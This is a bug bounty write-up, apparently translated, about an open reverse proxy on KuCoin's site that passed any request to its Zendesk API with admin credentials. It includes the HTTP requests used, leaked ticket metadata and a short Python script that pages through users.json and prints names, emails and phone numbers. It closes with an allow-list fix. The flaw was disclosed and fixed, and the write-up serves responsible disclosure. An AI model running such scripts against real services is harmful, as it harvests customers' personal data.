Recently, a cryptocurrency exchange called KuCoin launched a bug bounty program with rewards of up to $1,000,000, hosted on the HackenProof bug bounty platform.
As a web hacker, my approach to a new target is simple:
1. Proxy the browser traffic through Burp Suite and capture the requests
2. Click through every part of the web application to understand its functionality and framework
3. Analyse the HTTP requests recorded in Burp Suite
With the Burp proxy set up, I started testing from the registration flow. Skipping over a lot of uninteresting traffic, I came across this request:
GET /_api/zendesk/api/v2/help_center/en-us/articles/6545352890265.json HTTP/2
Host: www.kucoin.com
Connection: close
Zendesk is a customer service platform that lets businesses manage customer support issues. The request contains two API path segments, /_api/zendesk and /api/v2/, which looks like a reverse proxy in front of the Zendesk API. The response was:
{
  "data": {
    "article": {
      "id": 6545352890265,
      "url": "https://kucoin.zendesk.com/api/v2/help_center/en-us/articles/6545352890265.json",
      "html_url": "https://kucoin.zendesk.com/hc/en-us/articles/6545352890265-Change-Login-Password",
      "author_id": 903637920486,
      "comments_disabled": true,
      "draft": false,
      "promoted": false,
      "position": 0,
      "vote_sum": 1,
      "vote_count": 3,
      "section_id": 6632289240345,
      "created_at": "2022-05-12T12:33:28Z",
      "updated_at": "2023-02-07T04:08:29Z",
      "name": "Change Login Password",
      "title": "Change Login Password",
      "source_locale": "en-us",
      "locale": "en-us",
      "outdated": false,
      "outdated_locales": [],
      "edited_at": "2022-06-08T14:37:58Z",
      "user_segment_id": null,
      "permission_group_id": 830894,
      "content_tag_ids": [],
      "label_names": [],
      "body": "<table class=\"wrapped confluenceTable\">\n<tbody>\n<tr>\n<td class=\"confluenceTd\">1. Can't Receive Email/SMS Verification Code</td>\n</tr>\n<tr>\n<td class=\"confluenceTd\">\n<a class=\"external-link\" href=\"https://support.kucoin.plus/hc/en-us/articles/360015206853-Cannot-Receive-Email-Code-SMS-message\" rel=\"nofollow\">https://support.kucoin.plus/hc/en-us/articles/360015206853-Cannot-Receive-Email-Code-SMS-message</a><br>Please check the messages in your frequently used phone number or email that you may have used for registration. There shall be an notification when you complete the registration. Then use the correct account to reset password.</td>\n</tr>\n<tr>\n<td class=\"confluenceTd\">2. Still Unable to Log in After Resetting the Login Password</td>\n</tr>\n<tr>\n<td class=\"confluenceTd\">Please retry after clearing the cache or switch the browser. If you're still unable to log in, please make sure you input it in the correct format; please exclude the country code, e.g., for +82 123456, enter '123456' only, or try to remove/add 0 before your phone number and try again.</td>\n</tr>\n</tbody>\n</table>"
    }
  },
  "success": true
}
It forwards every path under /_api/zendesk/api/v2/:
GET /_api/zendesk/api/v2/ HTTP/2
Host: www.kucoin.com
Connection: close
{
  "data":
  "\n
  <html dir=\"ltr\" lang=\"en-US\">\n<head>\n
  <meta charset=\"utf-8\" />\n
  <!-- v22727 -->\n\n
  <title>The page you were looking for doesn't exist – KuCoin Help Center</title>\n\n \n\n
  <meta name=\"robots\" content=\"noindex, nofollow, noarchive, nosnippet\">\n\n
  <link rel=\"stylesheet\" href=\"//static.zdassets.com/hc/assets/application-4457e15fd2317df56adee04580b8726d.css\" media=\"all\" id=\"stylesheet\" />\n
  <link rel=\"stylesheet\" type=\"text/css\" href=\"//p25.zdassets.com/hc/theming_assets/2196095/360000017594/style.css?digest=9096602929177\">\n\n
  <link rel=\"icon\" type=\"image/x-icon\" href=\"//theme.zdassets.com/theme_assets/2196095/8ea3012f8759412bafaffd7d07248ed1e75d8afa.ico\" />\n\n
  <script>\nwindow.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;\nga('create', 'UA-46608064-13', 'auto');\nga('send', 'pageview');\n
  </script>\n<script async src='https://www.google-analytics.com/analytics.js'></script>\n\n \n\n
  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\"/>\n---SNIP---"
}
I checked the Zendesk API documentation and found the following:
You must be a verified user to make API requests. You can authorize against the API using either basic authentication with your email address and password, with your email address and an API token, or with an OAuth access token.
So the Zendesk API requires authentication, and KuCoin is proxying arbitrary requests to it, which means we can use the API directly under KuCoin's own authenticated identity.
I kept testing and found that the API has a tickets endpoint for listing and searching tickets:
GET /_api/zendesk/api/v2/tickets.json HTTP/2
Host: www.kucoin.com
Connection: close

HTTP/2 200 OK
Date: Tue, 18 Apr 2023 17:12:51 GMT
Content-Type: application/json
-- snip --
{
  "data": {
    "tickets": [{
      "url": "https://kucoin.zendesk.com/api/v2/tickets/285403.json",
      "id": 285403,
      "external_id": null,
      "via": {
        "channel": "email",
        "source": {
          "from": {
            "address": "[email protected]",
            "name": "Poloniex US"
          },
          "to": {
            "name": "KuCoin",
            "address": "[email protected]"
          },
          "rel": null
        }
      },
    --- snip ---
    "next_page": "https://kucoin.zendesk.com/api/v2/tickets.json?page=2",
    "previous_page": null,
    "count": 276479
Going through the data, there were 276479 tickets in Zendesk, containing sensitive information: PII (KYC documents in attachments), session tokens, IP addresses, account details and more.
Even more interesting, there is a search.json endpoint that allows searching the tickets.
The results included session tokens:
Other exploitable endpoints turned up as well.
Stealing user information:
GET /_api/zendesk/api/v2/users.json HTTP/2
Host: www.kucoin.com
Connection: close
This endpoint leaks every user's name, email address, phone number and so on, and it conveniently supports pagination.
I wrote a simple exploit script to demonstrate the issue:
import requests
from urllib.parse import urlparse, parse_qs

# The proxy attaches its own Zendesk credentials, so no authentication is sent here.
BASE_URL = 'https://www.kucoin.com/_api/zendesk/api/v2'

def get_all_zendesk_users(dump=False):
    page = BASE_URL + "/users.json"
    while True:
        r = requests.get(page)
        dat = r.json().get('data')
        users = dat.get('users')
        for u in users:
            print(f"{u['name']}, {u['email']}, {u['phone']}, {u['role']}")
        if dump:
            # Follow Zendesk's next_page link until the last page is reached
            if dat.get('next_page') is None:
                break
            parsed_url = urlparse(dat.get('next_page'))
            query_params = parse_qs(parsed_url.query)
            page = query_params.get('page', [None])[0]
            # next_page points at kucoin.zendesk.com, so rebuild it against the proxy
            page = f"{BASE_URL}/users.json?page={page}"
        else:
            break

get_all_zendesk_users(dump=True)
This vulnerability makes every endpoint in the Zendesk API reference usable: https://developer.zendesk.com/api-reference/
Root cause: https://kucoin.com/_api/zendesk/api/v2 is reverse-proxied to https://kucoin.zendesk.com/api/v2/ with admin-level credentials attached.
In the end I only received $5000. The official response:
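The fix that root cause calls for is an allow-list in front of the proxy: only the public Help Center reads the site actually needs are forwarded under the service credential, and everything else (tickets, users, search) is refused before any request leaves KuCoin. The following Python is an added example, not KuCoin's code; the two allowed path patterns and the pagination-only query policy are assumptions about what the site needs.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlencode, urlsplit

# Prefix and upstream are taken from the write-up; the allow-list itself is
# an assumption about which Help Center reads a public site should expose.
PROXY_PREFIX = "/_api/zendesk/api/v2"
UPSTREAM = "https://kucoin.zendesk.com/api/v2"
ALLOWED_PATHS = [
    re.compile(r"^/help_center/[a-z]{2}(?:-[a-z]{2})?/articles/\d+\.json$"),
    re.compile(r"^/help_center/[a-z]{2}(?:-[a-z]{2})?/sections/\d+/articles\.json$"),
]
ALLOWED_QUERY = {"page", "per_page"}


def resolve_upstream(method, request_target):
    """Return the upstream URL for an allow-listed request, or None to refuse.

    The decision is made before any Zendesk credential is attached, so a
    refused request never reaches kucoin.zendesk.com at all.
    """
    if method.upper() != "GET":
        return None
    parts = urlsplit(request_target)
    if not parts.path.startswith(PROXY_PREFIX + "/"):
        return None
    # Decode and collapse '.', '..' and '//' so a path such as
    # /help_center/en-us/articles/../../../tickets.json (or its
    # percent-encoded form) cannot slip past the prefix check.
    rest = posixpath.normpath(unquote(parts.path[len(PROXY_PREFIX):]))
    if not any(p.match(rest) for p in ALLOWED_PATHS):
        return None
    # Only pagination parameters with numeric values are forwarded; any
    # other parameter (include=, query=, ...) refuses the whole request.
    query = {}
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if key not in ALLOWED_QUERY or not all(v.isdigit() for v in values):
            return None
        query[key] = values[0]
    return UPSTREAM + rest + (f"?{urlencode(query)}" if query else "")
```

Where the articles the site needs are public in the Help Center, the same forwarder can run without attaching any Zendesk credential at all.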
Hi Sir: The issue has been fixed. After the team discussion, the current results are as follows:
Impact of information leakage: some user names and mailbox data are leaked (not everyone uses zendesk, so the amount of leaks is limited). So Vulnerability rating does not reach critical, rated as high.
Bounty detail: Information leakage bonus 2000$, zendesk API unauthorized access bonus 3000$. Final Total bonus is 5000$
Originally published on the WeChat public account 军机故阁: "5000$ cryptocurrency exchange KuCoin vulnerability"